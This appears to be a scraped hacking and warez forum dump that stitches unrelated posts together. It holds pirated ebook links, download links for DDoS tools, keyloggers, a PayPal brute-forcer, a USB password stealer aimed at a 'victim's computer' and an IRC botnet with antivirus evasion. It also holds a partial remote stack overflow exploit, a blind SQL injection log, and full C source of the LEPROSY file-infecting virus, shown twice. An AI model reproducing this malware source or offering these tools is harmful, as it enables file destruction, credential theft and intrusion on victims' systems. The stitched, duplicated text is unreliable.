But who wants to take on next-generation web programming with the last generation's instruction book? You need a learning experience that's as compelling and cutting-edge as the sites you want to design. That's where we come in. With Head Rush Ajax, in no time you'll be writing JavaScript code that fires off asynchronous requests to web servers...and having fun doing it. By the time you've taken your dynamic HTML, XML, JSON, and DOM skills up a few notches, you'll have solved tons of puzzles, figured out how well snowboards sell in Vail, and even watched a boxing match. Sound interesting? Then what are you waiting for? Pick up Head Rush Ajax and learn Ajax and asynchronous programming the right way--the way that sticks.


Download:

http://mihd.net/wf7rbc

==============================================================================================================
eBook.McGraw.Hill.Osborne.Oracle.Database.10g.SQL.chm 11-Jul-2007 14:19 849K
Sybex.Oracle9i.DBA.JumpStart.eBook-LiB.chm 11-Jul-2007 14:19 7.9M
Sams.Oracle.Database.10g.Insider.Solutions.chm 11-Jul-2007 14:19 12M
Que.Oracle.9i.Fundamentals.I.Exam.Cram.2.Nov.2004.eBook-LiB.chm 11-Jul-2007 14:19 3.4M
Prentice.Programming.Oracle.Triggers.And.Stored.Procedures.3rd.Edition.eBook-LiB.chm 11-Jul-2007 14:19 1.2M
Prentice.Oracle.PL.SQL.By.Example.3rd.Edition-LiB.chm 11-Jul-2007 14:19 1.1M
Prentice.Oracle.DBA.SQL.Quick.Reference.eBook-LiB.chm 11-Jul-2007 14:19 4.5M
Prentice.Oracle.DBA.Guide.To.Data.Warehousing.And.Star.Schemas.eBook-LiB.chm 11-Jul-2007 14:19 1.5M
Prentice.Hall.PTR.Oracle.DBA.Scripting.Quick.Reference.Apr.2004.eBook-DDU.chm 11-Jul-2007 14:19 187K
Oreilly.Oracle.Essentials.Oracle.Database.10g.3rd.Edition.eBook-LiB.chm 11-Jul-2007 14:19 1.8M
OReilly.Oracle.PL.SQL.for.DBAs.Oct.2005.chm 11-Jul-2007 14:19 929K
McGrawHill-Oracle_Database_10g_New_Features.chm 11-Jul-2007 14:19 1.6M
McGraw Hill - Oracle Database 10g, A Beginner's Guide.chm 11-Jul-2007 14:19 2.4M
McGraw.Hill.-.Oracle.Database.10g..High.Availablity.with.RAC.Flashback.&.Data.Guard.chm 11-Jul-2007 14:19 9.3M
Digital Press - Oracle High Performance Tuning for 9i and 10g.chm 11-Jul-2007 14:19 10M
Digital.Press.Oracle.High.Performance.Tuning.for.9i.and.10g.eBook-DDU.chm 11-Jul-2007 14:19 10M
Apress.Expert.Oracle9i.Database.Administration.eBook-LiB.chm 11-Jul-2007 14:19 9.8M
Addison.Wesley.Guerrilla.Oracle.eBook-LiB.chm 11-Jul-2007 14:19 9.5M
http://rapidshare.com/files/73890252/Oracle_Books.rar.html

Learn to program in C++
http://rapidshare.com/files/75974672/learn_to_program_with_c___2003.pdf

How to Program VB 5.0
http://rapidshare.com/files/40473676/_file_Visual_20Basic_20-_20How_20to_20Program_20VB_205.0_20CCE.rar

Beginning Phyton (eBook)
http://rapidshare.com/files/52654982/phyton.pdf

Computer Networking:A Top-DownApproachFeaturing theInternet
http://rapidshare.com/files/80433018/C_N_A_T.pdf

The Art of Computer Programming: Fundamental Algorithms
http://rapidshare.com/files/79972709/art-of-computer-programming-volume-1-fundamental-algorithms.9780201038019.2quote3665.pdf

33 ddos tools

: http://myfreefilehosting.com/f/567c176d70_3.18mb

Keyloggers

Keyloggers
-+- Dkey 2006 KEYLOGER - http://h4ck-y0u.org/viewtopic.php?t=11575
-+- Advanced Invisible Keyloger 1.5 - http://h4ck-y0u.org/viewtopic.php?t=26247
-+- Ardamax Keylogger - http://h4ck-y0u.org/viewtopic.php?t=32529
-+- Digital Keylogger Pro by Nytro - http://h4ck-y0u.org/viewtopic.php?t=35621
-+- Perfect keylogger - http://h4ck-y0u.org/viewtopic.php?t=31377
-+- Spytecor Keylogger 1.3.5 - http://h4ck-y0u.org/viewtopic.php?t=32637
-+- Spytech - Keystroke Spy v1.10 - http://h4ck-y0u.org/viewtopic.php?t=35589
-+- Ghost Keylogger 3.80 - http://h4ck-y0u.org/viewtopic.php?t=30091
-+- EliteLog 1.9 - http://h4ck-y0u.org/viewtopic.php?t=29674
-+- Golden Keylogger 1.32 - http://h4ck-y0u.org/viewtopic.php?t=4623

screen 4.0.3 loacal Authentication Bypass

Author: Rembrandt
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.

Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.

All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.

Alt-N SecurityGateway v1.00-1.01

* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is peace a cake job.
* To make a wroking code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the beffer gets
* lowered so the overflow should not contain upper chars :( . So i decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper use the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body contained
* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
* After few days of work i have comed with the required bindshell which bypass
* all restricted chars and executes. Thx to skylined, for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/

#include
#include
#include
#include
#include

#pragma comment(lib,"ws2_32")


void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);

USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Decompress the archive and put all the files located in the folder "USBThief"into a USB.
(You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply c/p ...)
Insert the USB in your victim's computer
View folder "dump" to see all passwords

Requirements:
No special!

Size:

1935 KB


Download:
Code:

http://rapidshare.com/files/99418536/USBThief.rar



Pass:
Code:

www.ultimate-caffe.org

USB Steals

USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Decompress the archive and put all the files located in the folder "USBThief"into a USB.
(You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply c/p ...)
Insert the USB in your victim's computer
View folder "dump" to see all passwords

Requirements:
No special!

Size:

1935 KB


Download:
Code:

http://rapidshare.com/files/99418536/USBThief.rar



Pass:
Code:

www.ultimate-caffe.org

This movie demonstrates how software vulnerabilities are exploited. It might also help penetration testers / ethical hackers to understand what is needed to write reliable exploits.

http://www.youtube.com/watch?v=jAX504trWZU&feature=related

Exploiting Software Vulnerabilities - A case study

This movie demonstrates how software vulnerabilities are exploited. It might also help penetration testers / ethical hackers to understand what is needed to write reliable exploits.

http://www.youtube.com/watch?v=jAX504trWZU&feature=related

Optimized Blind SQL Injection

Blind sql injection is a technique that let hackers retrieve database data through a sql injection that doesn't give out useful information through web application errors.

Security by obscurity is not security though. Sqlmap and Absinthe demonstrate this clearly. They are capable of getting you the whole database even if no error is shown when user inputs characters meant to
trigger an sql error.

So how is it possible to still get database data without triggering web application errors?
These tools basically work on a true/false base. They provide the web app with input known to be faulty to trigger a FALSE case and input known to be working to trigger a TRUE case.

Using a TRUE/FALSE condition a loop through the charset is undertaken to recover a string in the database one character at a time. Usually the SUBSTRING/CONCAT sql commands are used to match a correct guess with the TRUE case.

The problem with this approach is the time it takes to retrieve data from the database.
Most of the tools for blind sql injection are not optimized.
Recently I came across with a nice research from Secforce.

They have written a quick tool to optimize the task of dumping a database through a blind sql injection.

The tool, written in python is basically a shell.
You provide parameters like vulnerable web page and then it will retrieve the desired portion of database (table names, column names or full data), nothing different from all the other sql injection tools.

What makes this tool better than the others (for blind sqli) is its speed thanks to the optimizations used to find characters.
You can read more about the implemented optimizations here.
From a test I personally undergone I noticed that sqlmap is the tool that is best (together with secforce blind sql injection tool) at dumping data through blind sql injection.

Here's the dump from the console of an injection process using sqlmap:


C:\hack\SQL\sqlmap>sqlmap.py --url="http://localhost/vuln.asp?i=6" -p i -v 3 -b --string="Ciao"

sqlmap/0.6-rc5 coded by inquis
and belch

[14:33:38] [DEBUG] request:http://localhost/vuln.asp?i=6
[14:33:43] [INFO] testing if GET parameter 'i' is dynamic
[14:33:43] [DEBUG] request:http://localhost/vuln.asp?i=47
[14:33:46] [INFO] confirming that GET parameter 'i' is dynamic
[14:33:46] [DEBUG] request:http://localhost/vuln.asp?i='NoValue

[14:33:48] [DEBUG] request:http://localhost/vuln.asp?i="NoValue

[14:33:50] [INFO] GET parameter 'i' is dynamic
[14:33:50] [INFO] testing sql injection on GET parameter 'i'
[14:33:50] [INFO] testing numeric/unescaped injection on GET parameter 'i'

[14:33:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
3
[14:33:52] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
4
[14:33:55] [INFO] confirming numeric/unescaped injection on GET parameter 'brand
id'
[14:33:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND No
Value
[14:33:57] [INFO] GET parameter 'i' is numeric/unescaped injectable
[14:33:57] [INFO] testing MySQL
[14:33:57] [INFO] query: CONCAT('6', '6')
[14:33:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 63
[14:33:58] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 31
[14:34:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 15
[14:34:03] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 7
[14:34:05] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 3
[14:34:07] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 1
[14:34:09] [INFO] retrieved:
[14:34:09] [INFO] performed 6 queries in 12 seconds
[14:34:09] [WARNING] the remote DMBS is not MySQL

As you can see from the above, sqlmap starts trying to understand if the first character of our banner
has an ascii value greater of 63 (that is 127/2). Not in our case.



[14:34:09] [INFO] testing Oracle
[14:34:09] [INFO] query: LENGTH(SYSDATE)
[14:34:09] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 63
[14:34:11] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 31
[14:34:13] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 15
[14:34:15] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 7
[14:34:17] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 3
[14:34:19] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 1
[14:34:21] [INFO] retrieved:
[14:34:21] [INFO] performed 6 queries in 12 seconds
[14:34:21] [WARNING] the remote DMBS is not Oracle
[14:34:21] [INFO] testing PostgreSQL
[14:34:21] [INFO] query: COALESCE(5, NULL)
[14:34:21] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 63
[14:34:23] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 31
[14:34:25] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 15
[14:34:27] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 7
[14:34:29] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 3
[14:34:32] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 1
[14:34:34] [INFO] retrieved:
[14:34:34] [INFO] performed 6 queries in 12 seconds
[14:34:34] [WARNING] the remote DMBS is not PostgreSQL
[14:34:34] [INFO] testing Microsoft SQL Server
[14:34:34] [INFO] query: LTRIM(STR(LEN(1)))
[14:34:34] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 63
[14:34:36] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 31
[14:34:38] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 47
[14:34:41] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 55
[14:34:43] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 51
[14:34:45] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 49
[14:34:46] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 48
[14:34:48] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 63
[14:34:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 31
[14:34:53] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 15
[14:34:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 7
[14:34:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 3
[14:35:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 1
[14:35:03] [INFO] retrieved: 1
[14:35:03] [INFO] performed 13 queries in 28 seconds
remote DBMS: Microsoft SQL Server

The process above is discussed in the paper released by secforce.
Sqlmap has retrieved the database banner/version in approx. 60 seconds.

Blind SQL Injection shell has done in 80 seconds due to the fact that it retrieves all the chars one by one thus being able to retrieve any kind of banner with 100% precision while sqlmap requires the matching of few chars to match it with default banners.

paypal brute-forcer.

So pretty simple, paypal brute-forcer.

Code:

http://www.mediafire.com/?33pyjmzofz9

Dbot v3.0

- stable irc bot
- multicommand topic parsing
- multicommand chat parsing
- irc connection timeout
- unlimited number of irc servers
- xor encoded strings (antivirus anti-heuristic)
- md5 protected important commands (download, remove) - if the command is
long enough, NOONE can steal your bots
- copy to 3 different possible locations, but not windows or system32 dir
- registry startup
- win xp sp2 firewall bypass
- anti-sandbox
- multithreaded ftpd
- cftp supported
- ability to change cftp parameters while bot is running
- scanner:
* distinguese wan and lan bots; eg. lan bots using cftp, wan using ftp
* ability to use ftp or cftp
* multithreaded scanning
* every single thread checks for all ports (less threads needed for
more exploits)
* random or sequential scan
* ability to define range for lan bots to scan
- anti-botkiller protection with nulling all expired strings, coping to
alternative locations instead of windows or system32 dir
- tcpip.sys patcher (ver 1&2)
- botkiller

VNC Password Scanner + Universal VNC rooter :
- finds authbypass, no passworded and passworded vncs
- user defined wordlist
- every RFB3.8 server is checked for authbypass exploit first, if it fails
scanner switch to password checking
- 99,9% accurate scanner, at the time of scanning ALL vncs work!
- alternative VNC rooting via task manager (universal for all languages)
that works on win2000 and win xp
- reporting to irc: vnc version, desktop name, ip and password
- myvnc password reporting

Download:
http://www.darksun.ws/download/uploads/Bots/Dbot.v3.1.rar

A Compression Tool -kGB archiver

A Compression Tool

Also Supports zip , rar , kgb files

High Compression Ratio

File Size - 1.3 MB

Download Link -

http://rapidshare.com/files/90745460/KGB_Archiver.rar

On-Site Security Assessment

Internal on-site penetration testing gives the business the assurance it needs to conduct safely on the internet and with business partners.

Internal assessments use a similar methodology to an external assessment, however the engagement will occur from within the WAN at each logical management zone, physical segment or simply attached to the DMZ.

To attach to an internal network requires a significant depth of knowledge in many areas. These areas are not limited to Policy, Architecture, Implementation and Auditing across multiple business units, operating systems and devices. Pure Hacking has all of these skill sets.

With most internal assessments, Pure Hacking has discovered for its clients significant business risks that would cease business operations within hours. 20% of the remedial work for these clients gives them 80% of their security effectiveness and as such, the advice guards against network security attacks. The advice is independent of any vendor, and is often accomplished through our clients existing partners.

From an internal assessment, our clients gain more business value if part or all of their operations are outsourced. The recommendations given will be independent of any supplier or vendor, and as such, the current supplier can remedy the situation without further cost. The net results - our clients are safe and get a greater R.O.I from their outsourced partners and the outsourced partners gain specialized security intellectual property.

External Penetration Testing

What is an External Penetration Test?

This test focuses on

* server penetration testing
* router penetration testing
* firewall penetration testing
* operating system installation and maintenance.

The penetration test may be performed with non or full disclosure of the environment in question.
The engagement would start with publicly accessible information about the client, followed by network enumeration.
Network enumeration allows Pure Hacking to target hosts, and specific network security attacks. Pure Hacking would then assess the open ports, services and specific security vulnerabilities, and use that information to gain a toehold into the environment. After a toehold is established, escalation of privilege occurs until the external environment is controlled.

What do you get at the end of the engagement?

Depending on the scope of work, a typical report would include any or all of these components (reference: OSSTMM):

Network Security
Network Surveying
Port Scanning
System Identification
Services Identification
Vulnerability Research & Verification
Application Testing & Code Review
Router Testing
Firewall Testing
Intrusion Detection System Testing
Trusted Systems Testing
Password Cracking
Denial of Service Testing
Containment Measures Testing

Social Engineering
Request Testing
Guided Suggestion Testing
Trust Testing


Wireless Security
Wireless Networks Testing
Cordless Communications Testing
Privacy Review
Infrared Systems Testing

Communications Security
PBX Testing
Voicemail Testing
FAX review
Modem Testing

Physical Security
Access Controls Testing
Perimeter Review
Monitoring Review
Alarm Response Testing
Location Review
Environment Review

Why Pure Hacking

* The only dedicated Penetration Testing company, with a history of industry leadership in Internet Security designed to keep your mission critical systems safe.
* The discovery of real risks and solutions independent of any vendor
* Skills transfer for your staff as Pure Hacking will divulge all intellectual property and tools when Pure Hacking operates with you.
* A worldwide operation, so regardless of the size or location of your network, Pure Hacking will service your need.
* A flexible company that will work within your operational parameters.

At Pure Hacking, an external network security attack is the most common request from our clients. Every day of the week we are performing these engagements and as such, our skill set is efficient and effective. As we are performing penetration tests on a daily basis, we are the industry experts.

We are so confident with the service we offer, we guarantee our work to our client's level of satisfaction and keep continual contact at their requests. Our clients continue to use us because we are trustworthy, knowledgeable and exceptional value.

source code for leprosy_c.c

'Extra-Tiny' memory model startup code for Turbo C 2.0
;
; This makes smaller executable images from C programs, by
; removing code to get command line arguments and the like.
; Compile with Tiny model flag, do not use any standard I/O
; library functions, such as puts() or int86().
;
; This code courtesey PC Magazine, December 26, 1989.
; But nobody really needs to know that.


_text segment byte public 'code'
_text ends
_data segment word public 'data'
_data ends
_bss segment word public 'bss'
_bss ends

dgroup group _text, _data, _bss

_text segment
org 100h
begin:
_text ends

end begin
; 'Extra-Tiny' memory model startup code for Turbo C 2.0
;
; This makes smaller executable images from C programs, by
; removing code to get command line arguments and the like.
; Compile with Tiny model flag, do not use any standard I/O
; library functions, such as puts() or int86().
;
; This code courtesey PC Magazine, December 26, 1989.
; But nobody really needs to know that.


_text segment byte public 'code'
_text ends
_data segment word public 'data'
_data ends
_bss segment word public 'bss'
_bss ends

dgroup group _text, _data, _bss

_text segment
org 100h
begin:
_text ends

end begin
=============================

/* C Code starts here!
This file is part of the source code to the LEPROSY Virus 1.00
Copy-ya-right (c) 1990 by PCM2. This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files. (Unlike people like us, of course...)
*/


#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */


/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};



struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */


const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */


/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );



/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/

int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}


void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}


int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}



int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}


void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}


void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}


int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}


int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}


void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}


void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
/* This file is part of the source code to the LEPROSY Virus 1.00
Copy-ya-right (c) 1990 by PCM2. This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files. (Unlike people like us, of course...)
*/


#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */


/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};



struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */


const char filler[] = "XX"; /* Pad file length to 666 bytes. */
